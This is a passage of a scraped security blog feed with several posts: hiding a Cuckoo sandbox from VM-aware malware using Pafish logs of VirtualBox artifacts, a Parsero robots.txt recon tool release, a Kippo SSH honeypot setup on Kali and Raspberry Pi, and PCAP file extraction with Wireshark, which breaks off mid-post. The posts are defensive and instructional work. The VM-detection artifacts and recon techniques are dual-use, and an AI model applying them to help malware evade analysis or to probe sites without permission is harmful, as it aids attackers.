We want to maintain our virtual machine hidden from the malware samples, for this reason, we will modify our Sandbox to achieve our goal.</div>
<br />
<h2>
Detecting Virutal Machines with Pafish</h2>
<div style="text-align: justify;">
A year ago I read here: <a href="http://www.alienvault.com/open-threat-exchange/blog/hardening-cuckoo-sandbox-against-vm-aware-malware" target="_blank">Hardening Cuckoo Sandbox against VM aware malware</a> that Alberto Ortega had developed a new tool named Pafish. This tool can be executed in a Windows OS and it will detect if it is running in a virtual machine. Some months ago, it was published in the same blog that this tool had been used by some malware developers to add it to their malware in order to detect if the malicious program was running in a virtual environment to change its behaviour. In the link below you have a great post about it: <a href="http://www.alienvault.com/open-threat-exchange/blog/how-public-tools-are-used-by-malware-developers-the-antivm-tale" target="_blank">How public tools are used by malware developers, the antivm tale</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So we are going to use this free tool to check if our virtual machine could be detected by some anti-virtualization techniques. The tool is available in the link below. </div>
<br />
<div style="text-align: center;">
<a href="https://github.com/a0rtega/pafish/tree/master/pafish">https://github.com/a0rtega/pafish/tree/master/pafish</a></div>
<br />
<div style="text-align: justify;">
After executing Pafish, we can see the picture below which shows us that Pafish detected that the hard drive has less than 50GB storage. It is just a recommendation that if you are able to give more storage to your virtual machine, just do it!!! Do you know someone who has a computer with less than 50gb? I don't and for this reason, the malware could suspect that it is being run in a virtual environment.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUG0LXqq3PgvaF4fm3kJEGsH1ENNNk5JsAjtZ1gKyDLpOI5dNSEg9CnxDDktMkgnhacqBGlpAAmi5a9v1IeMv0afHufoUOrS4nQOu9XaC85GXzh5fxnJ7yfBE14ni_kNFqOR8ftlbFkNo/s1600/Pafish_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUG0LXqq3PgvaF4fm3kJEGsH1ENNNk5JsAjtZ1gKyDLpOI5dNSEg9CnxDDktMkgnhacqBGlpAAmi5a9v1IeMv0afHufoUOrS4nQOu9XaC85GXzh5fxnJ7yfBE14ni_kNFqOR8ftlbFkNo/s1600/Pafish_1.png" height="216" width="400" /></a></div>
<br />
<div style="text-align: justify;">
In the picture below you will see how Pafish has detected the Register Keys related with VirtualBox.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Eugy5nME3lJB8dNDoWm5gLipYLKbYy19s8NAwtsnkluJ7lazSKngvxHrei8FVGamOWnGckiP6H1EsqWqga-XreOjYFIgY9QnVJ9t30Dbg0zdMhrOzE0z0ZpibNvSL3gCjCakFUY-Jkk/s1600/Pafish_unpached.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Eugy5nME3lJB8dNDoWm5gLipYLKbYy19s8NAwtsnkluJ7lazSKngvxHrei8FVGamOWnGckiP6H1EsqWqga-XreOjYFIgY9QnVJ9t30Dbg0zdMhrOzE0z0ZpibNvSL3gCjCakFUY-Jkk/s1600/Pafish_unpached.png" height="200" width="400" /></a></div>
<br />
This tool creates a pafish.log which contain these lines. <br />
<pre class="brush: java">[pafish] Start
[pafish] Windows version: 5.1 build 2600
[pafish] Sandbox traced using mouse activity
[pafish] Sandbox traced by checking disk size <= 50GB
[pafish] Hooks traced using DeleteFileW method 1
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 "Identifier"
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\Description\System "SystemBiosVersion"
[pafish] VirtualBox traced using Reg key HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\Description\System "VideoBiosVersion"
[pafish] VirtualBox traced using file C:\WINDOWS\system32\drivers\VBoxMouse.sys
[pafish] End
</pre>
<h2>
Hinding our Virtual Machine</h2>
<div style="text-align: justify;">
I was reading some interesting blogs when I discovered this entry: <a href="http://kromer.pl/malware-analysis/installing-and-hardening-latest-cuckoo-sandbox-on-gentoo-linux/" target="_blank">Installing and hardening the latest Cuckoo Sandbox on Gentoo Linux</a> which saved me a lot of time.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Hubert Kromer has created a modified cuckoomon.dll to avoid being detected by the malware and he shares it with us here.</div>
<br />
<div style="text-align: center;">
<a href="https://github.com/markedoe/cuckoo-sandbox" target="_blank">https://github.com/markedoe/cuckoo-sandbox</a></div>
<br />
<div style="text-align: justify;">
You only need to replace the original one by the modified DLL in this path: </div>
<pre class="brush: java">/path/to/cuckoo/analyzer/windows/dll/cuckoomon.dll</pre>
<div style="text-align: justify;">
When this DLL is replaced (you don't need to restart Cuckoo) just send to Cuckoo Pafish.exe again. You can see the differences between using this DLL and using the other one.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKpd1eoj51ml3OkAeZXYXR7VCkrxabusFKFxEsp0E0hRCU101H2CYW_IYDJLKdGfCuwd5FP6CnCD5egNCF2x-LY860aBqoUnXN_16rtv8h5tBd8SzJZmkBp1AJOPJQ8SPvwrKouHQ3PYI/s1600/Pafish_Pached_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKpd1eoj51ml3OkAeZXYXR7VCkrxabusFKFxEsp0E0hRCU101H2CYW_IYDJLKdGfCuwd5FP6CnCD5egNCF2x-LY860aBqoUnXN_16rtv8h5tBd8SzJZmkBp1AJOPJQ8SPvwrKouHQ3PYI/s1600/Pafish_Pached_1.png" height="201" width="400" /></a></div>
<br />
<div style="text-align: justify;">
We can see in the Pafish.log file that our Sandbox is still be traced but as you can see, we will be able to avoid detection in the majority of traces that we were detected before.</div>
<pre class="brush: java">[pafish] Start
[pafish] Windows version: 5.1 build 2600
[pafish] Sandbox traced using mouse activity
[pafish] Sandbox traced by checking disk size <= 50GB
[pafish] Hooks traced using DeleteFileW method 1
[pafish] End
</pre>
<br />
Now, we need to figure out how we can avoid being detected by malware by not using the mouse in our automatic analysis. If you have some info about that, just let us know!!!<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com5tag:blogger.com,1999:blog-3160485247929481680.post-71763299620583798552014-02-09T00:57:00.000-08:002014-02-09T00:57:43.819-08:00Parsero v0.6 is OUT!!!!!<div style="text-align: justify;">
As you already know, Parsero is a free script written in Python which helps you to automatically audit the Robots.txt file of a web server. In just a few seconds, you are able to get a lot of valuable information which is needed when you are auditing a website.</div>
<br />
This tool is available for download here:<br />
<br />
<a href="https://github.com/behindthefirewalls/Parsero">https://github.com/behindthefirewalls/Parsero</a><br />
<br />
And here you can learn what Parsero already did.<br />
<br />
<a href="http://www.behindthefirewalls.com/2013/12/parsero-tool-to-audit-robotstxt.html" target="_blank">http://www.behindthefirewalls.com/2013/12/parsero-tool-to-audit-robotstxt.html </a><br />
<br />
<h2>
How to install Parsero v0.6</h2>
Parsero is really easy to install. You can install it for example, in Kali Linux. You only need to run the commands below.<br />
<pre class="brush: java">apt-get install python3
apt-get install python3-pip
pip-3.2 install urllib3
pip-3.2 install beautifulsoup4
git clone https://github.com/behindthefirewalls/Parsero.git
</pre>
<h2>
What's new?</h2>
If you look at the Parsero help, you will see two new features:<br />
<br />
<ul>
<li>"-o" : To only show the available Disallow entries.</li>
<li>"-sb" : To search in Bing indexed Dissallows.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKHw2ftaEKAWCVafpuELSyP-uhzF5JT1NKPZ4hH-bS77ImzxEvTChyAxKqCFC4vzxPT-Tzp8Xmle7dAjH_-iZC-QTUoUWWI5C1h-LqQGoaanYhl41tliSJCZkKgocC0hqxaS06y7o-Gno/s1600/Parsero_v6_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKHw2ftaEKAWCVafpuELSyP-uhzF5JT1NKPZ4hH-bS77ImzxEvTChyAxKqCFC4vzxPT-Tzp8Xmle7dAjH_-iZC-QTUoUWWI5C1h-LqQGoaanYhl41tliSJCZkKgocC0hqxaS06y7o-Gno/s1600/Parsero_v6_1.png" height="215" width="400" /></a></div>
<h2>
Showing only the available Disallows</h2>
<div style="text-align: justify;">
In the picture below you will see the difference between using the "-o" option and not using it.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If the robots.txt file has a few entries, I recommend you don't use the "-o" option because you will be able to figure out what type of content the administrator wanted to hide looking if you get all the results. But if the file is bigger, you have a lot of information to analyze and it is easer perform the audit getting only the links which are allowed to be visited.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj5Boku4MYiflwFOdlB3Yykgzk7_Pa0IepARuDFs3hDGsQn5dP895YaGPkK9LMY1rUljO99G-n2ru-aTQ_u4lUJepbtV5R_vhPEuLMtPeh70AOQtPdFbNre8eYpZ894QeWISa35phLqUE/s1600/Parsero_v06_2(2).PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj5Boku4MYiflwFOdlB3Yykgzk7_Pa0IepARuDFs3hDGsQn5dP895YaGPkK9LMY1rUljO99G-n2ru-aTQ_u4lUJepbtV5R_vhPEuLMtPeh70AOQtPdFbNre8eYpZ894QeWISa35phLqUE/s1600/Parsero_v06_2(2).PNG" height="250" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLLZemEJRgUHdHu6OKslcM7bywxJQ2Eepn0N5QV6f9_l6T_w1acXkg2MIzcokKGkE6puMyZG23xTArKe_JnR2MaD98mJCPWwU4kjadYGUrYPhmyOVJvoPcLgaulCViAJTItqvIv3CKQN0/s1600/Parsero_v06_2%25281%2529.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRKtaQSz72qaWNA5m3owuVoUvCkjwxgoTdkUdtDXzdUNOyT8CaDOxpQZbMzGXV0mxKIXAWklE9Rr6gh7-6lhxyB64ptwgpyXIFZGLt0I7R3ofPBokd_Sskev0EpfUcGm9ZiujKBps6B3k/s1600/Parsero_v06_2(1).PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a>
<br />
<h2>
Searching the Disallows entries in Bing</h2>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
The fact that the administrator wrote a robots.txt to try to hide the crawlers part of his content doesn't mean that the search engines don't index these Disallow entries.</div>
<br />
<div style="text-align: justify;">
For example, in the picture below, Parsero will find content indexed by Bing which it mustn't have been indexed. Parsero will show you the first 10 Bing results for the indexed Disallows.</div>
<br />
By doing CTRL+ click on the links, your browser will be redirected to:<br />
<br />
<ul>
<li style="text-align: justify;">White links: the search page in Bing.</li>
<li style="text-align: justify;">Green links: directly to the result found in Bing (the content is not always available and sometimes you will get a 404 HTTP code error).</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheTz6HuWNx8fuuIYsv7gvzMh6ZWxFBnXrAui8zglW63CpxFdu1TOm6FmNrMUCtIlyuIkjO5npiP8Sncpp6zVeIyeHkAkK2RQOLryP4cLvHlrXYLfGODvKgAY9N0nSIc1jEESvXRgHhK0/s1600/Parsero_Bing_1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheTz6HuWNx8fuuIYsv7gvzMh6ZWxFBnXrAui8zglW63CpxFdu1TOm6FmNrMUCtIlyuIkjO5npiP8Sncpp6zVeIyeHkAkK2RQOLryP4cLvHlrXYLfGODvKgAY9N0nSIc1jEESvXRgHhK0/s1600/Parsero_Bing_1.PNG" height="640" width="388" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com2tag:blogger.com,1999:blog-3160485247929481680.post-75289608166639434702014-02-04T00:16:00.000-08:002014-02-18T01:29:26.825-08:00SSH Honeynet: Kippo, Kali and Raspberry-PI<h2>
Kippo features </h2>
<div style="text-align: justify;">
A few months ago I could get access to a SSH Honeypot called Kippo. Kippo is designed to log SSH brute
force attacks and the entire shell interaction
performed by an attacker when the attack is successful.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The main features of this software are:</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li>To record the usernames and password which the attacker is trying to perform a brute-force attack.</li>
<li>To create a valid username/password like "root/root" to offer the attacker a fake filesystem (resembling a Debian 5.0) with the ability to add or remove files and save <span id="goog_1499239199"></span><span id="goog_1499239200"></span>the command executed by the attacker.</li>
<li>To save suspicious files downloaded (via wget) by the attacker.</li>
<li>Possibility of adding a /etc/passwd file so the attacker can 'cat' it. </li>
</ul>
<h2>
Installing Kali Linux in a Raspberry-PI</h2>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHhW6RRfdb98G0nNAxC9xIOxKqM-9ujgMmi1NpizX9ST3wZWz3kUJYViBAPFuj9sFCAYqo1goBT4lPWT002Riw-ZBQ5WQn5GSJkGOe5KDBow_v2onEzcQdOg3UZCzx26edigUd51UfnSY/s1600/ra-pi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHhW6RRfdb98G0nNAxC9xIOxKqM-9ujgMmi1NpizX9ST3wZWz3kUJYViBAPFuj9sFCAYqo1goBT4lPWT002Riw-ZBQ5WQn5GSJkGOe5KDBow_v2onEzcQdOg3UZCzx26edigUd51UfnSY/s1600/ra-pi.png" height="120" width="200" /></a>I decided to install Kippo at home. A HoneyNet should be available 24x7x365 because the longer it is available, the more events will be captured.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You already know that a Raspberry-PI is really cheap (around 50$ all included) and it has a lower power consumption. Because of that I will show you how to install it on your device.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Currently, Kali Linux is available for Raspberry-PI. I think is a good idea to install our HoneyNet on it. We will have the opportunity to use all tools hosted in this distribution at the same time our Kippo is running.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You can download Kali Linux for Raspberry-PI here: <a href="http://cdimage.kali.org/kali-latest/armel/kali-linux-1.0.5-armel-rpi.img.xz" target="_blank">kali-linux-1.0.5-armel-rpi.img.xz</a><br />
<br />
To install the Kali Linux version connect the SD card to your computer. In my case I have a 8gb SD card and I can detect where it is mounted by using the command below.</div>
<pre class="brush: java">sudo fdisk -l</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWJYNltbQoBv3hUwHrBk6bgXB_57nS2pGLk0ODfTH-D89dxPCYGC5aj0yurPbJG0E5gy8t7r3GDr3lu5E5TipOSmcXmiS6ZypxexLWsLQMjVXX9FFu16Bem6azaD58aiRYF5S4cqrlwNU/s1600/RasberryPI_Kali_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWJYNltbQoBv3hUwHrBk6bgXB_57nS2pGLk0ODfTH-D89dxPCYGC5aj0yurPbJG0E5gy8t7r3GDr3lu5E5TipOSmcXmiS6ZypxexLWsLQMjVXX9FFu16Bem6azaD58aiRYF5S4cqrlwNU/s1600/RasberryPI_Kali_1.png" /></a></div>
<br />
<div style="text-align: justify;">
When you already know where your SD card is mounted, execute this command to copy Kali Linux to the card and wait for a while (the time estimated to copy it will depend on how speedy your card is). </div>
<pre class="brush: java">sudo dd if=kali-linux-1.0.5-armel-rpi.img of=/dev/sdb bs=512k</pre>
<h2>
How to install Kippo</h2>
<div style="text-align: justify;">
We won't only install Kippo, we will also install a MySQL database to save the events and Kippo-Graph to look at these events in a Web interface.</div>
<br />
Please, follow the next steps to install Kippo.<br />
<pre class="brush: java">sudo apt-get install subversion python-twisted python-mysqldb apache2</pre>
1. Install MySQL<br />
<pre class="brush: java">root@kali:/# apt-get install mysql-server
root@kali:/# apt-get install mysql-client</pre>
2. Create the database and a user named Kippo with all privileges.<br />
<pre class="brush: java">root@kali:/# mysql -h localhost -u root -p
mysql> create database kippo;
mysql> GRANT ALL ON kippo.* TO 'kippo'@'localhost' IDENTIFIED BY 'Kippo-password';
exit</pre>
3. Download Kippo from <a href="http://kippo.googlecode.com/files/kippo-0.8.tar.gz" target="_blank">http://kippo.googlecode.com/files/kippo-0.8.tar.gz</a> and uncompress it at /usr/local/src/.<br />
<br />
4. Create the tables using the user just created.<br />
<pre class="brush: java">root@kali:/# cd /usr/local/src/kippo-0.8/doc/sql/
mysql> mysql -u kippo -p
mysql> use kippo;
mysql> source mysql.sql;
mysql> show tables;
exit
</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivHqDEGZSOGNUj3K87KcBziklZppwG-QQI-cQmRYc225eBLKXXgqY9P0-PIxr6KDGzGRFX1hbD_P6SJgVkpdHvLMT_m29LiNDszBzMPgwPc1dky0G0yqc96oB9BWfJBjKV7tGqYG8_Hsk/s1600/Kali_Kippo_Database.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivHqDEGZSOGNUj3K87KcBziklZppwG-QQI-cQmRYc225eBLKXXgqY9P0-PIxr6KDGzGRFX1hbD_P6SJgVkpdHvLMT_m29LiNDszBzMPgwPc1dky0G0yqc96oB9BWfJBjKV7tGqYG8_Hsk/s1600/Kali_Kippo_Database.png" /></a></div>
<br />
5. Add to kippo.cfg the lines bellow.<br />
<pre class="brush: java">[database_mysql]
host = localhost
database = kippo
username = kippo
password = Kippo-password</pre>
6. Create an unprivileged user to start Kippo and give him access to the folder.<br />
<pre class="brush: java">root@kali: useradd -d /home/kippo -s /bin/bash -m kippo -g sudo
root@kali:/usr/local/src# chown -R kippo kippo-0.8/</pre>
7. Install the packages required for Kippo-Graph.<br />
<pre class="brush: java">sudo apt-get update
sudo apt-get install libapache2-mod-php5 php5-cli php5-common php5-cgi php5-mysql php5-gd
</pre>
8. Download Kippo-Graph<br />
<pre class="brush: java">root@kali:/# wget http://bruteforce.gr/wp-content/uploads/kippo-graph-0.8.tar
root@kali:/# mv kippo-graph-0.8.tar /var/www/
root@kali:/var/www# tar xvf kippo-graph-0.8.tar --no-same-permissions
chmod 777 generated-graphs
vim config.php #enter the appropriate values
sudo /etc/init.d/apache2 restart
</pre>
9. Start Kippo<br />
<pre class="brush: java">root@kali:/usr/local/src/kippo-0.8# su kippo
kippo@kali:/usr/local/src/kippo-0.8# ./start.sh </pre>
<br />
<div style="text-align: justify;">
With Kippo just installed, you need to publish the service in the Internet. By default, Kippo listens in the port 2222. You can publish it by setting a PAT, I mean, redirecting in your router the port 22 from the external IP to the port 2222 of the Kippo's internal (private) IP.</div>
<h2>
Looking at the graphs</h2>
<div style="text-align: justify;">
To see the graphics, just get access to http://Raspberry-Pi_IP_Address/kippo-graph/</div>
<br />
You will see these graphics:<br />
<br />
<ul>
<li>Top 10 passwords</li>
<li>Top 10 usernames</li>
<li>Top 10 user-pass combos</li>
<li>Success ratio</li>
<li>Successes per day/week</li>
<li>Connections per IP for previous month</li>
<li>Successful logins from the same IP</li>
<li>Probes per day/week</li>
<li>Top 10 SSH clients</li>
<li>Human activity inside the honeypot</li>
<li>Top 10 input (overall)</li>
<li>Top 10 successful input</li>
<li>Top 10 failed input</li>
<li>passwd commands</li>
<li>wget commands</li>
<li>Executed scripts</li>
<li>Interesting commands</li>
<li>apt-get commands</li>
<li>Top 10 IP addresses probing the system for previous month</li>
<li>Total IP addresses probing the system per top 10 countries</li>
</ul>
<br />
Some examples here:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOSIPe3Er9sqOlQzvB6tQItDJ3I2m4AvatDpPDonJryM9jkhmLTvDgH_qyNYlb6IOJcfNqJJ1_wtoudKO6WEke1CjNHxfIDfArF2UNn42yq4QhRExal_Ge9IJ9agd9hdCNXp-5rBN49TA/s1600/Kippo_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOSIPe3Er9sqOlQzvB6tQItDJ3I2m4AvatDpPDonJryM9jkhmLTvDgH_qyNYlb6IOJcfNqJJ1_wtoudKO6WEke1CjNHxfIDfArF2UNn42yq4QhRExal_Ge9IJ9agd9hdCNXp-5rBN49TA/s1600/Kippo_1.png" height="242" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpOqFL5Z9WOfh2mcyfMMyBRRw7FA1y3ugMEzRbWrzp0GgRx48IIeIDfahQnSLpSGve_K0rnJkl6sJkspkzJ4VBCPC_t9tsRB-VkXGQ6EV4-M_yu2Ec6Rq7uX9poLgaMojnemgfzECBu5Y/s1600/Kippo_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpOqFL5Z9WOfh2mcyfMMyBRRw7FA1y3ugMEzRbWrzp0GgRx48IIeIDfahQnSLpSGve_K0rnJkl6sJkspkzJ4VBCPC_t9tsRB-VkXGQ6EV4-M_yu2Ec6Rq7uX9poLgaMojnemgfzECBu5Y/s1600/Kippo_2.png" height="236" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigtNBy_UrbSkzzlMOabdWYg_NRw3gmUuOWECoySK-fv8BJkPrVeR1JfMNexcRTLyPeMnyS6au4heXiyPhfmapJD3eK-zKGfqug69rOOiMUakaou34-OSlvn9y2S7Wx3AFIDFzOLn-92hA/s1600/Kippo_Gallery.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigtNBy_UrbSkzzlMOabdWYg_NRw3gmUuOWECoySK-fv8BJkPrVeR1JfMNexcRTLyPeMnyS6au4heXiyPhfmapJD3eK-zKGfqug69rOOiMUakaou34-OSlvn9y2S7Wx3AFIDFzOLn-92hA/s1600/Kippo_Gallery.png" height="418" width="640" /></a></div>
<br />
<h2>
The best feature</h2>
<div style="text-align: justify;">
In my opinion, the best Kippo feature is the capability of offering the attacker a fake filesystem and saving the commands which were executed by the intruder by just allowing him to get access to the system when the "successful" attack was produced.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Here you can get several malware samples and new scripts created by hackers. You will have a great opportunity to learn new hacker trends!!! </div>
<div style="text-align: justify;">
<br /></div>
In the file "/usr/local/src/kippo-0.8/data/userdb.txt" you can set the username/password "allowed" to get access to the fake system. You could set the password "root:0:root" or whatever you want to allow the hacker get access to.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilQRHFWHh0BW_270EMCeqnML792CbfTmd6feSa3elezsPdPZjcr2El_ecsjZa9qeiIaSewK3vPyM0TDqAHbnT51UwNWX0UkLvrdbVIb0hRfjsLXwRkmBM3zysyx1Sh-IJ1zBX0cweb3zE/s1600/Kippo_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilQRHFWHh0BW_270EMCeqnML792CbfTmd6feSa3elezsPdPZjcr2El_ecsjZa9qeiIaSewK3vPyM0TDqAHbnT51UwNWX0UkLvrdbVIb0hRfjsLXwRkmBM3zysyx1Sh-IJ1zBX0cweb3zE/s1600/Kippo_4.png" height="294" width="640" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXOR40KY71l8fEDTTacc20fS80hcLTFsN_Fk3Kvy6YGt3i5vGSqqeuQIxNj2RVF5TesV8-GSc4GDIshG12FGbhs6Rh7HGySjfi1RzYpz5one3z_5Jsregem_-CqtfdNOdRozG2VQFvmX8/s1600/Kippo_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXOR40KY71l8fEDTTacc20fS80hcLTFsN_Fk3Kvy6YGt3i5vGSqqeuQIxNj2RVF5TesV8-GSc4GDIshG12FGbhs6Rh7HGySjfi1RzYpz5one3z_5Jsregem_-CqtfdNOdRozG2VQFvmX8/s1600/Kippo_3.png" height="246" width="640" /></a> </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com7tag:blogger.com,1999:blog-3160485247929481680.post-92126038512068139412014-01-21T03:54:00.001-08:002014-01-22T00:07:01.056-08:00Extracting files from a network traffic capture (PCAP)<div style="text-align: justify;">
When we are involved in an incident handling and we are in charge of <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">analyzing a traffic capture in a pcap format related to an attack, one of the things we usually need to do is get the files which were downloaded. The reason is that we need to have a copy of the malware or the exploit to analyze it by reversing engineer or similar... </span></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">We usually detect the original sources where these files were downloaded from just analyzing the pcap file, but they disappear in a short period of time from they were originally hosted. Because of that, we will need to extract them directly from the pcap file.</span></span></div>
<br />
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">In this post, I will show you three different ways to achieve this goal using the the pcap hosted in Barracuda related to the <a href="http://www.behindthefirewalls.com/2013/10/analysis-attack-technical-analysis-php.html" target="_blank">www.php.net compromise</a> which can be downloaded here:</span></span><br />
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><a href="http://barracudalabs.com/downloads/5f810408ddbbd6d349b4be4766f41a37.pcap" target="_blank">http://barracudalabs.com/downloads/5f810408ddbbd6d349b4be4766f41a37.pcap</a></span></span></div>
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"></span></span>
<br />
<h3>
Wireshark</h3>
As you know, Wireshark is the most popular network protocol analyzer. It is capable of extracting all the files which were downloaded and captured.<br />
<br />
If you load the pcap file in you Wireshark and use the command below...<br />
<pre class="brush: java">http contains "in DOS mode"</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLoAUdKjElZrwdiMbtTCHig4ye5Lsdph4Hs8BmEmCiXIVkjrk2wR2RZuMBBCjYUxxSS4smJijgkqaSIijKo-pXrOSVa8cZHhH00FRPq2rcR97kIeQKJ0bSpR9-y3MTKsHL8tYc3vZjAGM/s1600/Wireshark_extracting_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLoAUdKjElZrwdiMbtTCHig4ye5Lsdph4Hs8BmEmCiXIVkjrk2wR2RZuMBBCjYUxxSS4smJijgkqaSIijKo-pXrOSVa8cZHhH00FRPq2rcR97kIeQKJ0bSpR9-y3MTKsHL8tYc3vZjAGM/s640/Wireshark_extracting_1.png" height="177" width="640" /></a></div>
<br />
... you can check that some executables were downloaded.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirH0OhBcURw36YlwP8G_368bmNRYIsG2REHM95zC0_0jEf1FH49_tlvpXYI7Bml2m8A0rUTbc-G5m8JtnVD1Ikw5l7NXUPL_FT9Yj1-qVMaL6jCHeIoXDI9tomYeSCuFfQFfBXYCcybRI/s1600/Wireshark_extracting_22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirH0OhBcURw36YlwP8G_368bmNRYIsG2REHM95zC0_0jEf1FH49_tlvpXYI7Bml2m8A0rUTbc-G5m8JtnVD1Ikw5l7NXUPL_FT9Yj1-qVMaL6jCHeIoXDI9tomYeSCuFfQFfBXYCcybRI/s1600/Wireshark_extracting_22.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
We are able to download all files which were downloaded like executables, pictures, javascripts, etc... by clicking File --> Export Objects --> HTTP and clicking on "Save all".<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
